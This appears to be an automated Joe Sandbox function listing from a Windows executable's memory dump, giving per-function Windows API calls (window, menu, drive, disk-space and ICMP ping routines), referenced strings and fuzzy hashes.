GetWindowRect.USER32(00000000,?), ref: 00D5C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00D5C7B6
GetDlgItem.USER32(?,00000002), ref: 00D5C7C1
GetWindowRect.USER32(00000000,?), ref: 00D5C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00D5C827
GetDlgItem.USER32(?,000003E9), ref: 00D5C835
GetWindowRect.USER32(00000000,?), ref: 00D5C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00D5C889
GetDlgItem.USER32(?,000003EA), ref: 00D5C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D5C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 00D5C8C1

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 0909ab6c5228bb651bf8305088346a4feacfd6fc1563693e028369fd68b59dd4
Instruction ID: 59906310aaf1a2503748b33da5305e0885d1778bbb667d55d1559849ec1de5bb
Opcode Fuzzy Hash: 0909ab6c5228bb651bf8305088346a4feacfd6fc1563693e028369fd68b59dd4
Instruction Fuzzy Hash: D9513071B10305AFDF18CF69DD8AAAEBBB6EB88311F14812DF915D7290D7709D448B60

Function 00D0201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D02036,?,00000000,?,?,?,?,00D016CB,00000000,?), ref: 00D01B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00D020D3
KillTimer.USER32(-00000001,?,?,?,?,00D016CB,00000000,?,?,00D01AE2,?,?), ref: 00D0216E
DestroyAcceleratorTable.USER32(00000000), ref: 00D3BEF6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D016CB,00000000,?,?,00D01AE2,?,?), ref: 00D3BF27
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D016CB,00000000,?,?,00D01AE2,?,?), ref: 00D3BF3E
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00D016CB,00000000,?,?,00D01AE2,?,?), ref: 00D3BF5A
DeleteObject.GDI32(00000000), ref: 00D3BF6C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 1f320d9e9eadf241cf227921de4eb75201ecac379cd496c51ab208505bfa25de
Instruction ID: 1e6f8176feee4fd39ce9bcd8b608f9cbe265b8c34dce228c74cd9c66dc4e4ea7
Opcode Fuzzy Hash: 1f320d9e9eadf241cf227921de4eb75201ecac379cd496c51ab208505bfa25de
Instruction Fuzzy Hash: 0D615631101712DFDB259F14CD48B3AB7B1FF40326F188929E68A86AA0C772E881DF71

Function 00D021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00D025DB: GetWindowLongW.USER32(?,000000EB), ref: 00D025EC

GetSysColor.USER32(0000000F), ref: 00D021D3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 674c29f0db0f56e45abe3404e23571bfab6e041e5395715575d3dfcb33449edc
Instruction ID: cb32bec01b5cfae70237aba2797227df5c628e43efcd6fe33c56ba8b3a327f8b
Opcode Fuzzy Hash: 674c29f0db0f56e45abe3404e23571bfab6e041e5395715575d3dfcb33449edc
Instruction Fuzzy Hash: EF41A031001240ABDB255F78DC8CBB93B65EB46331F584265FD69CA2E6C7318C82DB35

Function 00D6AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00D8F910), ref: 00D6AB76
GetDriveTypeW.KERNEL32(00000061,00DBA620,00000061), ref: 00D6AC40
_wcscpy.LIBCMT ref: 00D6AC6A

Strings

ramdisk, xrefs: 00D6ABEA
removable, xrefs: 00D6ABA8
fixed, xrefs: 00D6ABBE
unknown, xrefs: 00D6AC01
all, xrefs: 00D6AB7C
cdrom, xrefs: 00D6AB92
network, xrefs: 00D6ABD4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: da71e763f2e0b35a8edd5a4bd8415a3f6f0af855bf97b08b5939471b5c19b8a3
Instruction ID: b21837cb5db1d2be35b3f8bcbea04827c8df0e4e30640174078ba8c9d05a99a6
Opcode Fuzzy Hash: da71e763f2e0b35a8edd5a4bd8415a3f6f0af855bf97b08b5939471b5c19b8a3
Instruction Fuzzy Hash: D85159306183019FC714EF18D891AAEB7A5EF95304F544829F4DAA72A2DB31E949CA73

Function 00D09997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00D099C2
__swprintf.LIBCMT ref: 00D09A0C
__i64tow.LIBCMT ref: 00D3FA0F

Strings

%.15g, xrefs: 00D09A06
False, xrefs: 00D3F9D7
0x%p, xrefs: 00D3F9F1
True, xrefs: 00D3F9D0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: 07259277a4ff89c3c4d0585365b22f25fe3da6f60e6d9447e2f4bbb5f2ea78be
Instruction ID: 3b7be00cce431fae5c17c4fcef95279574c0e74acf6e143603af35f46395e4c7
Opcode Fuzzy Hash: 07259277a4ff89c3c4d0585365b22f25fe3da6f60e6d9447e2f4bbb5f2ea78be
Instruction Fuzzy Hash: 1D41A271A04219AEDB249B38E842F7AB7E8EF44314F24446EE58DD72D2EA71D9418F31

Function 00D873C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D873D9
CreateMenu.USER32 ref: 00D873F4
SetMenu.USER32(?,00000000), ref: 00D87403
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D87490
IsMenu.USER32(?), ref: 00D874A6
CreatePopupMenu.USER32 ref: 00D874B0
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D874DD
DrawMenuBar.USER32 ref: 00D874E5

Strings

F, xrefs: 00D874D1
0, xrefs: 00D873CF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: a7cb2577a7525822664e72a8613137c91862a19de5bad7fab46c294f43c09ed8
Instruction ID: 275ac772f5dc9d230b05fc11b6663f9273670f33d1e1b5ebfd605f8e293f5a59
Opcode Fuzzy Hash: a7cb2577a7525822664e72a8613137c91862a19de5bad7fab46c294f43c09ed8
Instruction Fuzzy Hash: CA41F775A05305EFDB10EF68D888E9ABBB9FF49310F284469E955A7360D731E910CB60

Function 00D8772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00D877CD
CreateCompatibleDC.GDI32(00000000), ref: 00D877D4
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00D877E7
SelectObject.GDI32(00000000,00000000), ref: 00D877EF
GetPixel.GDI32(00000000,00000000,00000000), ref: 00D877FA
DeleteDC.GDI32(00000000), ref: 00D87803
GetWindowLongW.USER32(?,000000EC), ref: 00D8780D
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00D87821
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00D8782D

Strings

static, xrefs: 00D87765

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: b61b0494058b50b7223da88ff3e46df97aab6e5f769de7363e19770b34c35668
Instruction ID: 6584b8305c3bb19873a16717522cc23a6e66ecf3d2ff3986903fcac7bb9c5e6c
Opcode Fuzzy Hash: b61b0494058b50b7223da88ff3e46df97aab6e5f769de7363e19770b34c35668
Instruction Fuzzy Hash: F7318932114215AFDF12AFA4DC09FEA3B69FF09720F240225FA15E62A0D731D821DBB4

Function 00D27040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D2707B

Part of subcall function 00D28D68: __getptd_noexit.LIBCMT ref: 00D28D68

__gmtime64_s.LIBCMT ref: 00D27114
__gmtime64_s.LIBCMT ref: 00D2714A
__gmtime64_s.LIBCMT ref: 00D27167
__allrem.LIBCMT ref: 00D271BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D271D9
__allrem.LIBCMT ref: 00D271F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D2720E
__allrem.LIBCMT ref: 00D27225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D27243
__invoke_watson.LIBCMT ref: 00D272B4

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 1e2e6b453be25e5977f77f2c9d636415aeb640da635ecc7ad24ea700477494a6
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: 3171F971A04726EBD7249E79DD42B5AB3B8FF20328F14422AF514E7281E770E9448BF4

Function 00D62A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D62A31
GetMenuItemInfoW.USER32(00DC6890,000000FF,00000000,00000030), ref: 00D62A92
SetMenuItemInfoW.USER32(00DC6890,00000004,00000000,00000030), ref: 00D62AC8
Sleep.KERNEL32(000001F4), ref: 00D62ADA
GetMenuItemCount.USER32(?), ref: 00D62B1E
GetMenuItemID.USER32(?,00000000), ref: 00D62B3A
GetMenuItemID.USER32(?,-00000001), ref: 00D62B64
GetMenuItemID.USER32(?,?), ref: 00D62BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D62BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D62C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D62C24

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 48a86c62d7d1174900416c76cd0e52419fe7631c73bae932ccee2855199ed072
Instruction ID: e58bd7aa19b1fcac9135a75abee97d20b78bdeb98639c9148d5c6d06cd632938
Opcode Fuzzy Hash: 48a86c62d7d1174900416c76cd0e52419fe7631c73bae932ccee2855199ed072
Instruction Fuzzy Hash: 1861B1B090074AAFDB21CFA8DC88EBEBBB8EB45304F180569E881D7255D771AD05DB31

Function 00D87192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00D87214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00D87217
GetWindowLongW.USER32(?,000000F0), ref: 00D8723B
_memset.LIBCMT ref: 00D8724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D8725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00D872D6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: b31515d84662db7dcb7ba2571795bf2007cfecc48ed109d54af38d580d63cd83
Instruction ID: 14c4578507e41693c842ec9cb1f07977a598294609629f5589d184e7714af807
Opcode Fuzzy Hash: b31515d84662db7dcb7ba2571795bf2007cfecc48ed109d54af38d580d63cd83
Instruction Fuzzy Hash: D96149B5A00209AFDB11EFA4CC85EEE77B8EF09714F240169FA14E72A1D770E945DB60

Function 00D5710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00D57135
SafeArrayAllocData.OLEAUT32(?), ref: 00D5718E
VariantInit.OLEAUT32(?), ref: 00D571A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00D571C0
VariantCopy.OLEAUT32(?,?), ref: 00D57213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00D57227
VariantClear.OLEAUT32(?), ref: 00D5723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00D57249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D57252
VariantClear.OLEAUT32(?), ref: 00D57264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00D5726F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 10fa73b720a718040e96d36c84c542becf9cb8e9d4db4e5ab41ea94eb577813c
Instruction ID: ccb96df86685fc184501197f59c0729e3cce253c917edc4d23535e790f9e41fa
Opcode Fuzzy Hash: 10fa73b720a718040e96d36c84c542becf9cb8e9d4db4e5ab41ea94eb577813c
Instruction Fuzzy Hash: 7D412C35A04219AFCF00DFA8D8449AEBBB9EF48355F108069FD55E7361CB30A949CBB0

Function 00D75A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00D75AA6
inet_addr.WSOCK32(?,?,?), ref: 00D75AEB
gethostbyname.WSOCK32(?), ref: 00D75AF7
IcmpCreateFile.IPHLPAPI ref: 00D75B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D75B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D75B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00D75C00
WSACleanup.WSOCK32 ref: 00D75C06

Strings

Ping, xrefs: 00D75B29

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 930a1aadec1e94e0c179330a06ac50fd4774f6b7a42336ff99795efbb6022ecc
Instruction ID: 64a9834ff8c857bdb54fcc498bc9c55f0a0923cd64840fc54ba03d6b0ec26d93
Opcode Fuzzy Hash: 930a1aadec1e94e0c179330a06ac50fd4774f6b7a42336ff99795efbb6022ecc
Instruction Fuzzy Hash: 8E5172316047019FDB119F24DC49B2AB7E4EF48710F14892AF999DB2E5EBB0E840DB76

Function 00D6B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D6B73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D6B7B1
GetLastError.KERNEL32 ref: 00D6B7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00D6B828

Strings

UNKNOWN, xrefs: 00D6B7E0
READY, xrefs: 00D6B801
INVALID, xrefs: 00D6B7FA
NOTREADY, xrefs: 00D6B7E7
READONLY, xrefs: 00D6B7F3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 11a982db4026ce8b2de85ba2378d1fd67f6b3cc56c3c909f6174932fb97dec5c
Instruction ID: 77d70cecb74a82dcb75b59ebfb1c36b61d08f4965310a156f8aa93967f8c0199
Opcode Fuzzy Hash: 11a982db4026ce8b2de85ba2378d1fd67f6b3cc56c3c909f6174932fb97dec5c
Instruction Fuzzy Hash: 9E314135A00305AFDB10EF68D885ABEBBB8EF55720F14402AE506D7291DB719986CB71

Function 00D59471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00D594F6
GetDlgCtrlID.USER32 ref: 00D59501
GetParent.USER32 ref: 00D5951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D59520
GetDlgCtrlID.USER32(?), ref: 00D59529
GetParent.USER32(?), ref: 00D59545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D59548

Strings

ComboBox, xrefs: 00D5947E
ListBox, xrefs: 00D594B3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a27f98d72a7bd44bf69d5d08150ab43bbb1465195797be9a49f9101146ac35cf
Instruction ID: 5930d25f7a9e9ea229e5cab148f3292ecf33e3f1a5fc925b3ce0ed93bc9e7d42
Opcode Fuzzy Hash: a27f98d72a7bd44bf69d5d08150ab43bbb1465195797be9a49f9101146ac35cf
Instruction Fuzzy Hash: 0621B270A00204ABCF05AB65CC95EFEBB64EF49310F100219BD62972E1EB7599199B30

Function 00D5955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D5B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00D5B0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D595DF
GetDlgCtrlID.USER32 ref: 00D595EA
GetParent.USER32 ref: 00D59606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00D59609
GetDlgCtrlID.USER32(?), ref: 00D59612
GetParent.USER32(?), ref: 00D5962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00D59631

Strings

ComboBox, xrefs: 00D59569
ListBox, xrefs: 00D5959E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 16cd23462d6f4ee28b73bb2feef0babf42e31c8966b102dead7b85d20f4ff640
